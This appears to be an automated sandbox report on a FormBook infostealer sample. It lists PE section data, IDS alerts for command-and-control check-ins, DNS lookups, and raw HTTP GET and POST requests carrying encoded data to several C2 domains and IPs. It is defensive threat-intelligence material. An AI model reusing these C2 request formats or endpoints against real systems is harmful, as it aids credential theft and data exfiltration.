IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x45694 | 0x45800 | 0c76c536aad0dd8789ecb1adb82e65e5 | False | 0.9885552495503597 | data | 7.995275199427175 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x47000 | 0x2358 | 0x2400 | 3f5572a8563784d4bacd9fd5cb4b3964 | False | 0.9434678819444444 | data | 7.754725785414912 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x470b4 | 0x228d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced |  |  | 0.9710570944036179
RT_GROUP_ICON | 0x49344 | 0x14 | data |  |  | 1.05
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-13T15:12:00.551136+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 49970 | 47.83.1.90 | 80 | TCP
2025-01-13T15:12:00.551136+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49970 | 47.83.1.90 | 80 | TCP
2025-01-13T15:12:16.130205+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49972 | 84.32.84.32 | 80 | TCP
2025-01-13T15:12:18.671305+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49973 | 84.32.84.32 | 80 | TCP
2025-01-13T15:12:21.231723+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49974 | 84.32.84.32 | 80 | TCP
2025-01-13T15:12:23.765934+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 49975 | 84.32.84.32 | 80 | TCP
2025-01-13T15:12:23.765934+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49975 | 84.32.84.32 | 80 | TCP
2025-01-13T15:12:29.500646+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49976 | 104.21.18.171 | 80 | TCP
2025-01-13T15:12:32.013724+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49977 | 104.21.18.171 | 80 | TCP
2025-01-13T15:12:34.547791+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49978 | 104.21.18.171 | 80 | TCP
2025-01-13T15:12:37.125958+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 49979 | 104.21.18.171 | 80 | TCP
2025-01-13T15:12:37.125958+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49979 | 104.21.18.171 | 80 | TCP
2025-01-13T15:12:43.965959+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49980 | 134.122.135.48 | 80 | TCP
2025-01-13T15:12:46.486294+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49981 | 134.122.135.48 | 80 | TCP
2025-01-13T15:12:49.063476+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49982 | 134.122.135.48 | 80 | TCP
2025-01-13T15:12:51.673190+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 49983 | 134.122.135.48 | 80 | TCP
2025-01-13T15:12:51.673190+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49983 | 134.122.135.48 | 80 | TCP
2025-01-13T15:12:57.418188+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49984 | 199.192.21.169 | 80 | TCP
2025-01-13T15:12:59.875023+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49985 | 199.192.21.169 | 80 | TCP
2025-01-13T15:13:02.590146+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49986 | 199.192.21.169 | 80 | TCP
2025-01-13T15:13:04.984315+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.7 | 49987 | 199.192.21.169 | 80 | TCP
2025-01-13T15:13:04.984315+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.7 | 49987 | 199.192.21.169 | 80 | TCP
2025-01-13T15:13:11.105513+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49988 | 154.197.162.239 | 80 | TCP
2025-01-13T15:13:14.071351+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49989 | 154.197.162.239 | 80 | TCP
2025-01-13T15:13:16.637822+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.7 | 49990 | 154.197.162.239 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Jan 13, 2025 15:12:20.783090115 CET804997484.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:20.785379887 CET804997484.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:21.231240034 CET804997484.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:21.231723070 CET4997480192.168.2.784.32.84.32
                                              Jan 13, 2025 15:12:22.282015085 CET4997480192.168.2.784.32.84.32
                                              Jan 13, 2025 15:12:22.289103985 CET804997484.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:23.303313017 CET4997580192.168.2.784.32.84.32
                                              Jan 13, 2025 15:12:23.308217049 CET804997584.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:23.308314085 CET4997580192.168.2.784.32.84.32
                                              Jan 13, 2025 15:12:23.317295074 CET4997580192.168.2.784.32.84.32
                                              Jan 13, 2025 15:12:23.322179079 CET804997584.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:23.765716076 CET804997584.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:23.765743971 CET804997584.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:23.765753984 CET804997584.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:23.765789986 CET804997584.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:23.765803099 CET804997584.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:23.765814066 CET804997584.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:23.765826941 CET804997584.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:23.765836954 CET804997584.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:23.765849113 CET804997584.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:23.765860081 CET804997584.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:23.765933990 CET4997580192.168.2.784.32.84.32
                                              Jan 13, 2025 15:12:23.766246080 CET4997580192.168.2.784.32.84.32
                                              Jan 13, 2025 15:12:23.770458937 CET4997580192.168.2.784.32.84.32
                                              Jan 13, 2025 15:12:23.776010990 CET804997584.32.84.32192.168.2.7
                                              Jan 13, 2025 15:12:28.806952000 CET4997680192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:28.811862946 CET8049976104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:28.811975002 CET4997680192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:28.825917959 CET4997680192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:28.830720901 CET8049976104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:29.500003099 CET8049976104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:29.500560999 CET8049976104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:29.500646114 CET4997680192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:30.328877926 CET4997680192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:31.347290039 CET4997780192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:31.352669954 CET8049977104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:31.352787018 CET4997780192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:31.365685940 CET4997780192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:31.370737076 CET8049977104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:32.012839079 CET8049977104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:32.013632059 CET8049977104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:32.013724089 CET4997780192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:32.876203060 CET4997780192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:33.894385099 CET4997880192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:33.899266958 CET8049978104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:33.899364948 CET4997880192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:33.913347960 CET4997880192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:33.918211937 CET8049978104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:33.918370962 CET8049978104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:34.546976089 CET8049978104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:34.547673941 CET8049978104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:34.547791004 CET4997880192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:35.422513962 CET4997880192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:36.440958977 CET4997980192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:36.445987940 CET8049979104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:36.446151972 CET4997980192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:36.454006910 CET4997980192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:36.458831072 CET8049979104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:37.125741005 CET8049979104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:37.125761986 CET8049979104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:37.125957966 CET4997980192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:37.128647089 CET4997980192.168.2.7104.21.18.171
                                              Jan 13, 2025 15:12:37.133599043 CET8049979104.21.18.171192.168.2.7
                                              Jan 13, 2025 15:12:43.003753901 CET4998080192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:43.008826971 CET8049980134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:43.008941889 CET4998080192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:43.022403002 CET4998080192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:43.027343035 CET8049980134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:43.965837002 CET8049980134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:43.965903044 CET8049980134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:43.965959072 CET4998080192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:44.532100916 CET4998080192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:45.550400972 CET4998180192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:45.555517912 CET8049981134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:45.555644989 CET4998180192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:45.567640066 CET4998180192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:45.572504997 CET8049981134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:46.485959053 CET8049981134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:46.486238003 CET8049981134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:46.486294031 CET4998180192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:47.078727007 CET4998180192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:48.110903025 CET4998280192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:48.115844965 CET8049982134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:48.115962029 CET4998280192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:48.131705999 CET4998280192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:48.136584044 CET8049982134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:48.136657000 CET8049982134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:49.063261032 CET8049982134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:49.063344002 CET8049982134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:49.063476086 CET4998280192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:49.644454956 CET4998280192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:50.660252094 CET4998380192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:50.665170908 CET8049983134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:50.665257931 CET4998380192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:50.674694061 CET4998380192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:50.679441929 CET8049983134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:51.672843933 CET8049983134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:51.672933102 CET8049983134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:51.673190117 CET4998380192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:51.675359011 CET4998380192.168.2.7134.122.135.48
                                              Jan 13, 2025 15:12:51.680198908 CET8049983134.122.135.48192.168.2.7
                                              Jan 13, 2025 15:12:56.707526922 CET4998480192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:12:56.712377071 CET8049984199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:12:56.712516069 CET4998480192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:12:56.725663900 CET4998480192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:12:56.730487108 CET8049984199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:12:57.418040037 CET8049984199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:12:57.418062925 CET8049984199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:12:57.418072939 CET8049984199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:12:57.418188095 CET4998480192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:12:58.235446930 CET4998480192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:12:59.256436110 CET4998580192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:12:59.261501074 CET8049985199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:12:59.261575937 CET4998580192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:12:59.279766083 CET4998580192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:12:59.284956932 CET8049985199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:12:59.874948978 CET8049985199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:12:59.874970913 CET8049985199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:12:59.875022888 CET4998580192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:13:00.781735897 CET4998580192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:13:01.801675081 CET4998680192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:13:01.806699038 CET8049986199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:13:01.806915045 CET4998680192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:13:01.824652910 CET4998680192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:13:01.829771042 CET8049986199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:13:01.829894066 CET8049986199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:13:02.589643002 CET8049986199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:13:02.589708090 CET8049986199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:13:02.590146065 CET4998680192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:13:03.328823090 CET4998680192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:13:04.348114014 CET4998780192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:13:04.353023052 CET8049987199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:13:04.353868008 CET4998780192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:13:04.362180948 CET4998780192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:13:04.367003918 CET8049987199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:13:04.983576059 CET8049987199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:13:04.984253883 CET8049987199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:13:04.984314919 CET4998780192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:13:04.986888885 CET4998780192.168.2.7199.192.21.169
                                              Jan 13, 2025 15:13:04.991667986 CET8049987199.192.21.169192.168.2.7
                                              Jan 13, 2025 15:13:10.352494001 CET4998880192.168.2.7154.197.162.239
                                              Jan 13, 2025 15:13:10.357372046 CET8049988154.197.162.239192.168.2.7
                                              Jan 13, 2025 15:13:10.357461929 CET4998880192.168.2.7154.197.162.239
                                              Jan 13, 2025 15:13:10.939888954 CET4998880192.168.2.7154.197.162.239
                                              Jan 13, 2025 15:13:10.946563959 CET8049988154.197.162.239192.168.2.7
                                              Jan 13, 2025 15:13:11.105389118 CET8049988154.197.162.239192.168.2.7
                                              Jan 13, 2025 15:13:11.105453014 CET8049988154.197.162.239192.168.2.7
                                              Jan 13, 2025 15:13:11.105513096 CET4998880192.168.2.7154.197.162.239
                                              Jan 13, 2025 15:13:12.453556061 CET4998880192.168.2.7154.197.162.239
                                              Jan 13, 2025 15:13:13.472177029 CET4998980192.168.2.7154.197.162.239
                                              Jan 13, 2025 15:13:13.477263927 CET8049989154.197.162.239192.168.2.7
                                              Jan 13, 2025 15:13:13.477360010 CET4998980192.168.2.7154.197.162.239
                                              Jan 13, 2025 15:13:13.492908955 CET4998980192.168.2.7154.197.162.239
                                              Jan 13, 2025 15:13:13.498477936 CET8049989154.197.162.239192.168.2.7
                                              Jan 13, 2025 15:13:14.070802927 CET8049989154.197.162.239192.168.2.7
                                              Jan 13, 2025 15:13:14.070856094 CET8049989154.197.162.239192.168.2.7
                                              Jan 13, 2025 15:13:14.071351051 CET4998980192.168.2.7154.197.162.239
                                              Jan 13, 2025 15:13:15.003329992 CET4998980192.168.2.7154.197.162.239
                                              Jan 13, 2025 15:13:16.019099951 CET4999080192.168.2.7154.197.162.239
                                              Jan 13, 2025 15:13:16.023936987 CET8049990154.197.162.239192.168.2.7
                                              Jan 13, 2025 15:13:16.024035931 CET4999080192.168.2.7154.197.162.239
                                              Jan 13, 2025 15:13:16.038543940 CET4999080192.168.2.7154.197.162.239
                                              Jan 13, 2025 15:13:16.043334961 CET8049990154.197.162.239192.168.2.7
                                              Jan 13, 2025 15:13:16.043451071 CET8049990154.197.162.239192.168.2.7
                                              Jan 13, 2025 15:13:16.637634039 CET8049990154.197.162.239192.168.2.7
                                              Jan 13, 2025 15:13:16.637768984 CET8049990154.197.162.239192.168.2.7
                                              Jan 13, 2025 15:13:16.637821913 CET4999080192.168.2.7154.197.162.239
                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 13, 2025 15:11:58.844191074 CET5090853192.168.2.71.1.1.1
                                              Jan 13, 2025 15:11:58.869842052 CET53509081.1.1.1192.168.2.7
                                              Jan 13, 2025 15:12:15.598342896 CET5239653192.168.2.71.1.1.1
                                              Jan 13, 2025 15:12:15.649455070 CET53523961.1.1.1192.168.2.7
                                              Jan 13, 2025 15:12:28.789077044 CET5532853192.168.2.71.1.1.1
                                              Jan 13, 2025 15:12:28.804534912 CET53553281.1.1.1192.168.2.7
                                              Jan 13, 2025 15:12:42.144491911 CET5763053192.168.2.71.1.1.1
                                              Jan 13, 2025 15:12:43.001068115 CET53576301.1.1.1192.168.2.7
                                              Jan 13, 2025 15:12:56.691220999 CET5446853192.168.2.71.1.1.1
                                              Jan 13, 2025 15:12:56.703926086 CET53544681.1.1.1192.168.2.7
                                              Jan 13, 2025 15:13:10.004805088 CET5414953192.168.2.71.1.1.1
                                              Jan 13, 2025 15:13:10.348145008 CET53541491.1.1.1192.168.2.7
                                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                              Jan 13, 2025 15:11:58.844191074 CET | 192.168.2.7 | 1.1.1.1 | 0x9a4e | Standard query (0) | www.gayhxi.info | A (IP address) | IN (0x0001) | false
                                              Jan 13, 2025 15:12:15.598342896 CET | 192.168.2.7 | 1.1.1.1 | 0xb05d | Standard query (0) | www.promocao.info | A (IP address) | IN (0x0001) | false
                                              Jan 13, 2025 15:12:28.789077044 CET | 192.168.2.7 | 1.1.1.1 | 0x2366 | Standard query (0) | www.grimbo.boats | A (IP address) | IN (0x0001) | false
                                              Jan 13, 2025 15:12:42.144491911 CET | 192.168.2.7 | 1.1.1.1 | 0x8767 | Standard query (0) | www.44756.pizza | A (IP address) | IN (0x0001) | false
                                              Jan 13, 2025 15:12:56.691220999 CET | 192.168.2.7 | 1.1.1.1 | 0xb782 | Standard query (0) | www.lonfor.website | A (IP address) | IN (0x0001) | false
                                              Jan 13, 2025 15:13:10.004805088 CET | 192.168.2.7 | 1.1.1.1 | 0xe8b2 | Standard query (0) | www.investshares.net | A (IP address) | IN (0x0001) | false
                                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                              Jan 13, 2025 15:11:58.869842052 CET | 1.1.1.1 | 192.168.2.7 | 0x9a4e | No error (0) | www.gayhxi.info | - | 47.83.1.90 | A (IP address) | IN (0x0001) | false
                                              Jan 13, 2025 15:12:15.649455070 CET | 1.1.1.1 | 192.168.2.7 | 0xb05d | No error (0) | www.promocao.info | promocao.info | - | CNAME (Canonical name) | IN (0x0001) | false
                                              Jan 13, 2025 15:12:15.649455070 CET | 1.1.1.1 | 192.168.2.7 | 0xb05d | No error (0) | promocao.info | - | 84.32.84.32 | A (IP address) | IN (0x0001) | false
                                              Jan 13, 2025 15:12:28.804534912 CET | 1.1.1.1 | 192.168.2.7 | 0x2366 | No error (0) | www.grimbo.boats | - | 104.21.18.171 | A (IP address) | IN (0x0001) | false
                                              Jan 13, 2025 15:12:28.804534912 CET | 1.1.1.1 | 192.168.2.7 | 0x2366 | No error (0) | www.grimbo.boats | - | 172.67.182.198 | A (IP address) | IN (0x0001) | false
                                              Jan 13, 2025 15:12:43.001068115 CET | 1.1.1.1 | 192.168.2.7 | 0x8767 | No error (0) | www.44756.pizza | zcdn.8383dns.com | - | CNAME (Canonical name) | IN (0x0001) | false
                                              Jan 13, 2025 15:12:43.001068115 CET | 1.1.1.1 | 192.168.2.7 | 0x8767 | No error (0) | zcdn.8383dns.com | - | 134.122.135.48 | A (IP address) | IN (0x0001) | false
                                              Jan 13, 2025 15:12:43.001068115 CET | 1.1.1.1 | 192.168.2.7 | 0x8767 | No error (0) | zcdn.8383dns.com | - | 134.122.133.80 | A (IP address) | IN (0x0001) | false
                                              Jan 13, 2025 15:12:56.703926086 CET | 1.1.1.1 | 192.168.2.7 | 0xb782 | No error (0) | www.lonfor.website | - | 199.192.21.169 | A (IP address) | IN (0x0001) | false
                                              Jan 13, 2025 15:13:10.348145008 CET | 1.1.1.1 | 192.168.2.7 | 0xe8b2 | No error (0) | www.investshares.net | - | 154.197.162.239 | A (IP address) | IN (0x0001) | false
                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              0 | 192.168.2.7 | 49970 | 47.83.1.90 | 80 | 524 | C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jan 13, 2025 15:11:58.893848896 CET | 490 | OUT | GET /k2i2/?e4M=Tfa0_jE0&ptH8A6=oYl0YuhK+EfenM8ZaSaHfCiYAhLiDDJWSGf6Q1012MfAC24gU0JLDS7JdRiR078xrhufJIQsd6i55/X9+LeTWnvTNq0buLUzVN+8DkO+pt5xnDU0gcgj2/kU9yS2vcWWPXQj2rjTuuLx HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Host: www.gayhxi.info
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Jan 13, 2025 15:12:00.550860882 CET | 139 | IN | HTTP/1.1 567 unknown
                                              Server: nginx/1.18.0
                                              Date: Mon, 13 Jan 2025 14:12:00 GMT
                                              Content-Length: 17
                                              Connection: close
                                              Data Ascii: Request too large


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              1 | 192.168.2.7 | 49972 | 84.32.84.32 | 80 | 524 | C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jan 13, 2025 15:12:15.672153950 CET | 754 | OUT | POST /zaz4/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.promocao.info
                                              Origin: http://www.promocao.info
                                              Cache-Control: max-age=0
                                              Content-Length: 219
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.promocao.info/zaz4/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Ascii: ptH8A6=X9vn1b2Z0AtCTWVLtZ7lt3cWfLYFITelDmINYQDMPGIpikq0GVrw7x1g1gNsxHKVYWN50xxz13cf/iVjiD1utBkPkmIE+qSC4dQ0vTs2KCaFJumbctLb1GUL0zdE3sDjd4xxJ/XYuiATiI0JbxxWdZQrQVCTADczve6y8SurSvO5TapFsBRY/TBVK9kFEDJRrS0hflb9vdhQJHbnuA==


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              2 | 192.168.2.7 | 49973 | 84.32.84.32 | 80 | 524 | C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jan 13, 2025 15:12:18.226303101 CET | 774 | OUT | POST /zaz4/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.promocao.info
                                              Origin: http://www.promocao.info
                                              Cache-Control: max-age=0
                                              Content-Length: 239
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.promocao.info/zaz4/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Ascii: ptH8A6=X9vn1b2Z0AtCT3FL+KTlk3cVBbYFejehDmENYSvcP1sphH+0HUrw+x1g+ANp/nKkYWxx0wNz10gf/npji0pttRkNpGIaxKSC4dQ0vTQcKBqFKeWbdI/c2GUIzzdEzsCqd4xPJ9viug4TiKsJbgxRKpQpOlDWEBFLm+iI2BS/d9uBWson2jd0hC5uO/AzTlUkpTw5SHvcwqE6EV6j480Eaeaca3vN7tl1KAuJVwQ=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              3 | 192.168.2.7 | 49974 | 84.32.84.32 | 80 | 524 | C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jan 13, 2025 15:12:20.775971889 CET | 1787 | OUT | POST /zaz4/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.promocao.info
                                              Origin: http://www.promocao.info
                                              Cache-Control: max-age=0
                                              Content-Length: 1251
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.promocao.info/zaz4/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1


